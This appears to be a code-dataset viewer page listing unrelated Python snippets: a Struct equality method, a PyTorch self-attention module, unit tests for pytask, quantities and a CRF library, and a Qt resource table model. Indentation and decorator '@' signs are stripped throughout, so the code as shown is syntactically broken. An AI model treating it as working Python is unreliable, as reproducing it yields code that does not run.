lines.append(('%20s\t%s' % (field_name, getattr(self, field_name))))
return '\n'.join(lines)
def __eq__(self, other):
fields = getattr(self, '_fields_', [])
if isinstance(other, Struct):
try:
if (len(fields) != len(getattr(other, '_fields_', []))):
return False
for (field_name, _) in fields:
if (getattr(self, field_name) != getattr(other, field_name)):
return False
return True
except AttributeError:
return False
elif isinstance(other, (list, tuple)):
if (len(fields) != len(other)):
return False
try:
for (i, (field_name, _)) in enumerate(fields):
if (getattr(self, field_name) != other[i]):
return False
return True
except Exception:
return False
return False
def __ne__(self, other):
return (not self.__eq__(other))
__hash__ = None |
class Self_Attn(nn.Module):
def __init__(self, in_dim, latent_dim=8):
super(Self_Attn, self).__init__()
self.channel_in = in_dim
self.channel_latent = (in_dim // latent_dim)
self.query_conv = nn.Conv2d(in_channels=in_dim, out_channels=(in_dim // latent_dim), kernel_size=1)
self.key_conv = nn.Conv2d(in_channels=in_dim, out_channels=(in_dim // latent_dim), kernel_size=1)
self.value_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)
self.gamma = nn.Parameter(torch.zeros(1))
self.softmax = nn.Softmax(dim=(- 1))
def forward(self, x):
(batchsize, C, height, width) = x.size()
proj_query = self.query_conv(x).view(batchsize, (- 1), (height * width)).permute(0, 2, 1)
proj_key = self.key_conv(x).view(batchsize, (- 1), (height * width))
energy = torch.bmm(proj_query, proj_key)
attention = self.softmax(energy)
proj_value = self.value_conv(x).view(batchsize, (- 1), (height * width))
out = torch.bmm(proj_value, attention.permute(0, 2, 1))
out = out.view(batchsize, C, height, width)
out = ((self.gamma * out) + x)
return out |
class Request():
first_party_url: Optional[QUrl]
request_url: QUrl
is_blocked: bool = False
resource_type: Optional[ResourceType] = None
def block(self) -> None:
self.is_blocked = True
def redirect(self, url: QUrl, *, ignore_unsupported: bool=False) -> None:
raise NotImplementedError |
.end_to_end()
def test_dry_run_skipped_successful(runner, tmp_path):
source = '\n import pytask\n\n .produces("out.txt")\n def task_example(produces):\n produces.touch()\n '
tmp_path.joinpath('task_example.py').write_text(textwrap.dedent(source))
result = runner.invoke(cli, [tmp_path.as_posix()])
assert (result.exit_code == ExitCode.OK)
assert ('1 Succeeded' in result.output)
result = runner.invoke(cli, ['--dry-run', tmp_path.as_posix()])
assert (result.exit_code == ExitCode.OK)
assert ('1 Skipped because unchanged' in result.output) |
.parametrize('x, cohort, n, axis', [_random_cohort_data((20,), n=3, axis=0), _random_cohort_data((20, 20), n=2, axis=0, dtype=np.float32), _random_cohort_data((10, 10), n=2, axis=(- 1), scale=30, dtype=np.int16), _random_cohort_data((20, 20), n=3, axis=(- 1), missing=0.3), _random_cohort_data((7, 103, 4), n=5, axis=1, scale=7, missing=0.3), _random_cohort_data(((3, 4), (50, 50, 3), 4), n=5, axis=1, scale=7, dtype=np.uint8), _random_cohort_data(((6, 6), (50, 50, 7), (3, 1)), n=5, axis=1, scale=7, missing=0.3)])
.parametrize('reduction, func', [(cohort_sum, np.sum), (cohort_nansum, np.nansum), (cohort_mean, np.mean), (cohort_nanmean, np.nanmean)])
def test_cohort_reductions(reduction, func, x, cohort, n, axis):
expect = _cohort_reduction(func, x, cohort, n, axis=axis)
actual = reduction(x, cohort, n, axis=axis)
np.testing.assert_array_almost_equal(expect, actual) |
class TestUmath(TestCase):
def q(self):
return ([1, 2, 3, 4] * pq.J)
def test_prod(self):
self.assertQuantityEqual(np.prod(self.q), (24 * (pq.J ** 4)))
def test_sum(self):
self.assertQuantityEqual(np.sum(self.q), (10 * pq.J))
def test_nansum(self):
c = ([1, 2, 3, np.nan] * pq.m)
self.assertQuantityEqual(np.nansum(c), (6 * pq.m))
def test_cumprod(self):
self.assertRaises(ValueError, np.cumprod, self.q)
q = ([10, 0.1, 5, 50] * pq.dimensionless)
self.assertQuantityEqual(np.cumprod(q), [10, 1, 5, 250])
def test_cumsum(self):
self.assertQuantityEqual(np.cumsum(self.q), ([1, 3, 6, 10] * pq.J))
def test_diff(self):
self.assertQuantityEqual(np.diff(self.q, 1), ([1, 1, 1] * pq.J))
def test_ediff1d(self):
self.assertQuantityEqual(np.diff(self.q, 1), ([1, 1, 1] * pq.J))
def test_linspace(self):
self.assertQuantityEqual(np.linspace(self.q[0], self.q[(- 1)], 4), self.q)
def test_gradient(self):
try:
l = np.gradient(([[1, 1], [3, 4]] * pq.J), (1 * pq.m))
self.assertQuantityEqual(l[0], (([[2.0, 3.0], [2.0, 3.0]] * pq.J) / pq.m))
self.assertQuantityEqual(l[1], (([[0.0, 0.0], [1.0, 1.0]] * pq.J) / pq.m))
except ValueError as e:
raise self.failureException(e)
def test_cross(self):
a = ([3, (- 3), 1] * pq.kPa)
b = ([4, 9, 2] * (pq.m ** 2))
self.assertQuantityEqual(np.cross(a, b), (([(- 15), (- 2), 39] * pq.kPa) * (pq.m ** 2)))
def test_trapz(self):
self.assertQuantityEqual(np.trapz(self.q, dx=(1 * pq.m)), ((7.5 * pq.J) * pq.m))
def test_sinh(self):
q = ([1, 2, 3, 4, 6] * pq.radian)
self.assertQuantityEqual(np.sinh(q), np.sinh(q.magnitude))
def test_arcsinh(self):
q = ([1, 2, 3, 4, 6] * pq.dimensionless)
self.assertQuantityEqual(np.arcsinh(q), (np.arcsinh(q.magnitude) * pq.rad))
def test_cosh(self):
q = ([1, 2, 3, 4, 6] * pq.radian)
self.assertQuantityEqual(np.cosh(q), (np.cosh(q.magnitude) * pq.dimensionless))
def test_arccosh(self):
q = ([1, 2, 3, 4, 6] * pq.dimensionless)
self.assertQuantityEqual(np.arccosh(q), (np.arccosh(q.magnitude) * pq.rad))
def test_tanh(self):
q = ([1, 2, 3, 4, 6] * pq.rad)
self.assertQuantityEqual(np.tanh(q), np.tanh(q.magnitude))
def test_arctanh(self):
q = ([0.01, 0.5, 0.6, 0.8, 0.99] * pq.dimensionless)
self.assertQuantityEqual(np.arctanh(q), (np.arctanh(q.magnitude) * pq.rad))
def test_around(self):
self.assertQuantityEqual(np.around(([0.5, 1.5, 2.5, 3.5, 4.5] * pq.J)), ([0.0, 2.0, 2.0, 4.0, 4.0] * pq.J))
self.assertQuantityEqual(np.around(([1, 2, 3, 11] * pq.J), decimals=1), ([1, 2, 3, 11] * pq.J))
self.assertQuantityEqual(np.around(([1, 2, 3, 11] * pq.J), decimals=(- 1)), ([0, 0, 0, 10] * pq.J))
def test_round(self):
self.assertQuantityEqual(np.round(([0.5, 1.5, 2.5, 3.5, 4.5] * pq.J)), ([0.0, 2.0, 2.0, 4.0, 4.0] * pq.J))
self.assertQuantityEqual(np.round(([1, 2, 3, 11] * pq.J), decimals=1), ([1, 2, 3, 11] * pq.J))
self.assertQuantityEqual(np.round(([1, 2, 3, 11] * pq.J), decimals=(- 1)), ([0, 0, 0, 10] * pq.J))
def test_rint(self):
a = ([(- 4.1), (- 3.6), (- 2.5), 0.1, 2.5, 3.1, 3.9] * pq.m)
self.assertQuantityEqual(np.rint(a), ([(- 4.0), (- 4.0), (- 2.0), 0.0, 2.0, 3.0, 4.0] * pq.m))
def test_floor(self):
a = ([(- 1.7), (- 1.5), (- 0.2), 0.2, 1.5, 1.7, 2.0] * pq.m)
self.assertQuantityEqual(np.floor(a), ([(- 2.0), (- 2.0), (- 1.0), 0.0, 1.0, 1.0, 2.0] * pq.m))
def test_ceil(self):
a = ([(- 1.7), (- 1.5), (- 0.2), 0.2, 1.5, 1.7, 2.0] * pq.m)
self.assertQuantityEqual(np.ceil(a), ([(- 1.0), (- 1.0), (- 0.0), 1.0, 2.0, 2.0, 2.0] * pq.m))
def test_fix(self):
self.assertQuantityEqual(np.fix((3.14 * pq.degF)), (3.0 * pq.degF))
self.assertQuantityEqual(np.fix((3.0 * pq.degF)), (3.0 * pq.degF))
self.assertQuantityEqual(np.fix(([2.1, 2.9, (- 2.1), (- 2.9)] * pq.degF)), ([2.0, 2.0, (- 2.0), (- 2.0)] * pq.degF))
def test_exp(self):
self.assertQuantityEqual(np.exp((1 * pq.dimensionless)), np.e)
self.assertRaises(ValueError, np.exp, (1 * pq.m))
def test_exp2(self):
self.assertQuantityEqual(np.exp2((1 * pq.dimensionless)), 2.0)
self.assertRaises(ValueError, np.exp2, (1 * pq.m))
def test_log(self):
self.assertQuantityEqual(np.log((1 * pq.dimensionless)), 0)
self.assertRaises(ValueError, np.log, (1 * pq.m))
def test_log10(self):
self.assertQuantityEqual(np.log10((1 * pq.dimensionless)), 0)
self.assertRaises(ValueError, np.log10, (1 * pq.m))
def test_log2(self):
self.assertQuantityEqual(np.log2((1 * pq.dimensionless)), 0)
self.assertRaises(ValueError, np.log2, (1 * pq.m))
def test_expm1(self):
self.assertQuantityEqual(np.expm1((1 * pq.dimensionless)), (np.e - 1))
self.assertRaises(ValueError, np.expm1, (1 * pq.m))
def test_log1p(self):
self.assertQuantityEqual(np.log1p((0 * pq.dimensionless)), 0)
self.assertRaises(ValueError, np.log1p, (1 * pq.m))
def test_sin(self):
self.assertQuantityEqual(np.sin(((np.pi / 2) * pq.radian)), 1)
self.assertRaises(ValueError, np.sin, (1 * pq.m))
def test_arcsin(self):
self.assertQuantityEqual(np.arcsin((1 * pq.dimensionless)), ((np.pi / 2) * pq.radian))
self.assertRaises(ValueError, np.arcsin, (1 * pq.m))
def test_cos(self):
self.assertQuantityEqual(np.cos((np.pi * pq.radians)), (- 1))
self.assertRaises(ValueError, np.cos, (1 * pq.m))
def test_arccos(self):
self.assertQuantityEqual(np.arccos((1 * pq.dimensionless)), (0 * pq.radian))
self.assertRaises(ValueError, np.arccos, (1 * pq.m))
def test_tan(self):
self.assertQuantityEqual(np.tan((0 * pq.radian)), 0)
self.assertRaises(ValueError, np.tan, (1 * pq.m))
def test_arctan(self):
self.assertQuantityEqual(np.arctan((0 * pq.dimensionless)), (0 * pq.radian))
self.assertRaises(ValueError, np.arctan, (1 * pq.m))
def test_arctan2(self):
self.assertQuantityEqual(np.arctan2((0 * pq.dimensionless), (0 * pq.dimensionless)), 0)
self.assertQuantityEqual(np.arctan2((3 * pq.V), (3 * pq.V)), (np.radians(45) * pq.dimensionless))
self.assertRaises((TypeError, ValueError), np.arctan2, ((1 * pq.m), (1 * pq.m)))
def test_hypot(self):
self.assertQuantityEqual(np.hypot((3 * pq.m), (4 * pq.m)), (5 * pq.m))
self.assertRaises(ValueError, np.hypot, (1 * pq.m), (2 * pq.J))
def test_degrees(self):
self.assertQuantityEqual(np.degrees((6 * pq.radians)), (6 * pq.radians).rescale(pq.degree))
self.assertRaises(ValueError, np.degrees, (0 * pq.degree))
def test_radians(self):
self.assertQuantityEqual(np.radians((6 * pq.degree)), (6 * pq.degree).rescale(pq.radian))
self.assertRaises(ValueError, np.radians, (0 * pq.radians))
def test_unwrap(self):
self.assertQuantityEqual(np.unwrap(([0, (3 * np.pi)] * pq.radians)), [0, np.pi])
self.assertQuantityEqual(np.unwrap(([0, 540] * pq.deg)), ([0, 180] * pq.deg))
def test_equal(self):
arr1 = ((1, 1) * pq.m)
arr2 = ((1.0, 1.0) * pq.m)
self.assertTrue(np.all(np.equal(arr1, arr2)))
self.assertFalse(np.all(np.equal(arr1, (arr2 * 2))))
def test_not_equal(self):
arr1 = ((1, 1) * pq.m)
arr2 = ((1.0, 1.0) * pq.m)
self.assertTrue(np.all(np.not_equal(arr1, (arr2 * 2))))
self.assertFalse(np.all(np.not_equal(arr1, arr2)))
def test_less(self):
arr1 = ((1, 1) * pq.m)
arr2 = ((1.0, 1.0) * pq.m)
self.assertTrue(np.all(np.less(arr1, (arr2 * 2))))
self.assertFalse(np.all(np.less((arr1 * 2), arr2)))
def test_less_equal(self):
arr1 = ((1, 1) * pq.m)
arr2 = ((1.0, 2.0) * pq.m)
self.assertTrue(np.all(np.less_equal(arr1, arr2)))
self.assertFalse(np.all(np.less_equal(arr2, arr1)))
def test_greater(self):
arr1 = ((1, 1) * pq.m)
arr2 = ((1.0, 2.0) * pq.m)
self.assertTrue(np.all(np.greater((arr2 * 1.01), arr1)))
self.assertFalse(np.all(np.greater(arr2, arr1)))
def test_greater_equal(self):
arr1 = ((1, 1) * pq.m)
arr2 = ((1.0, 2.0) * pq.m)
self.assertTrue(np.all(np.greater_equal(arr2, arr1)))
self.assertFalse(np.all(np.greater_equal((arr2 * 0.99), arr1))) |
class ResourceDatabaseGenericModel(QtCore.QAbstractTableModel):
def __init__(self, db: ResourceDatabase, resource_type: ResourceType):
super().__init__()
self.db = db
self.resource_type = resource_type
self.allow_edits = True
def _get_items(self):
return self.db.get_by_type(self.resource_type)
def set_allow_edits(self, value: bool):
self.beginResetModel()
self.allow_edits = value
self.endResetModel()
def all_columns(self) -> list[FieldDefinition]:
return GENERIC_FIELDS
def headerData(self, section: int, orientation: QtCore.Qt.Orientation, role: int=...) -> typing.Any:
if (role != Qt.DisplayRole):
return None
if (orientation != Qt.Horizontal):
return section
return self.all_columns()[section].display_name
def rowCount(self, parent: QtCore.QModelIndex=...) -> int:
result = len(self._get_items())
if self.allow_edits:
result += 1
return result
def columnCount(self, parent: QtCore.QModelIndex=...) -> int:
return len(self.all_columns())
def data(self, index: QtCore.QModelIndex, role: int=...) -> typing.Any:
if (role not in {Qt.DisplayRole, Qt.EditRole}):
return None
all_items = self._get_items()
if (index.row() < len(all_items)):
resource = all_items[index.row()]
field = self.all_columns()[index.column()]
return field.to_qt(getattr(resource, field.field_name))
elif (role == Qt.DisplayRole):
if (index.column() == 0):
return 'New...'
else:
return ''
def setData(self, index: QtCore.QModelIndex, value: typing.Any, role: int=...) -> bool:
if (role == Qt.ItemDataRole.EditRole):
all_items = self._get_items()
if (index.row() < len(all_items)):
resource = all_items[index.row()]
field = self.all_columns()[index.column()]
(valid, new_value) = field.from_qt(value)
if valid:
all_items[index.row()] = dataclasses.replace(resource, **{field.field_name: new_value})
self.dataChanged.emit(index, index, [Qt.ItemDataRole.DisplayRole])
return True
elif value:
return self.append_item(self._create_item(value))
return False
def _create_item(self, short_name) -> ResourceInfo:
return SimpleResourceInfo(self.db.first_unused_resource_index(), short_name, short_name, self.resource_type)
def append_item(self, resource: ResourceInfo) -> bool:
assert (resource.resource_index == self.db.first_unused_resource_index())
row = self.rowCount()
self.beginInsertRows(QtCore.QModelIndex(), (row + 1), (row + 1))
self._get_items().append(resource)
self.endInsertRows()
return True
def flags(self, index: QtCore.QModelIndex) -> QtCore.Qt.ItemFlags:
result = (Qt.ItemFlag.ItemIsEnabled | Qt.ItemFlag.ItemIsSelectable)
if self.allow_edits:
if (index.row() == len(self._get_items())):
if (index.column() == 0):
result |= Qt.ItemFlag.ItemIsEditable
elif (index.column() > 0):
result |= Qt.ItemFlag.ItemIsEditable
return result |
def names_modified_in_lvalue(lvalue: Lvalue) -> list[NameExpr]:
if isinstance(lvalue, NameExpr):
return [lvalue]
elif isinstance(lvalue, StarExpr):
return names_modified_in_lvalue(lvalue.expr)
elif isinstance(lvalue, (ListExpr, TupleExpr)):
result: list[NameExpr] = []
for item in lvalue.items:
result += names_modified_in_lvalue(item)
return result
return [] |
def test_fixed_time_dependent_ding():
ocp = prepare_ocp(model=Model(time_as_states=False), n_stim=10, n_shooting=10, final_time=1, time_bimapping=False, use_sx=True)
sol = ocp.solve()
(force_vector, cn_vector, time_vector) = result_vectors(sol)
plt.plot(time_vector, force_vector)
plt.plot(time_vector, cn_vector) |
def test_initialize():
rnd = np.random.RandomState(0)
x = rnd.normal(size=(13, 5))
y = rnd.randint(3, size=13)
crf = ChainCRF(n_states=3, n_features=5)
crf.initialize([x], [y])
crf = ChainCRF()
crf.initialize([x], [y])
assert_equal(crf.n_states, 3)
assert_equal(crf.n_features, 5)
crf = ChainCRF(n_states=2)
assert_raises(ValueError, crf.initialize, X=[x], Y=[y])
pass |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.